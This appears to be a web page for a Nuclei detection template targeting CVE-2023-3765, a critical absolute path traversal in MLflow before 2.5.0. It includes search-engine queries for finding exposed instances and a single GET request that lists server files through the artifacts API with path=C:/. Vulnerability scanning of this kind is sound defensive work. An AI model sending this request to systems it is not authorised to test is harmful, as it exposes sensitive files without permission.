Skip to content

MLflow Absolute Path Traversal

ID: CVE-2023-3765

Severity: critical

Author: DhiyaneshDK

Tags: cve2023,cve,mflow,lfi,huntr,lfprojects

Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.

id: CVE-2023-3765
info:
name: MLflow Absolute Path Traversal
author: DhiyaneshDK
severity: critical
description: |
Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.
impact: |
This vulnerability can lead to unauthorized access to sensitive information stored on the server.
remediation: |
Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability.
reference:
- https://www.tenable.com/cve/CVE-2023-3765
- https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76
- https://nvd.nist.gov/vuln/detail/CVE-2023-3765
- https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9b
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2023-3765
cwe-id: CWE-36
epss-score: 0.01303
epss-percentile: 0.85869
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve2023,cve,mflow,lfi,huntr,lfprojects
http:
- method: GET
path:
- "{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"
matchers-condition: and
matchers:
- type: word
words:
- '"is_dir":'
- '"path":'
- '"files":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a0047304502201a1283579059b368724fd1cd50bbf943ff81de171b92ee47e7d422cf4050731d022100fc71396eb7db08ef89a36a5f57266c0a02b7bcdb86c71e27434aa53d8d7b3608:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-3765.yaml"

View on Github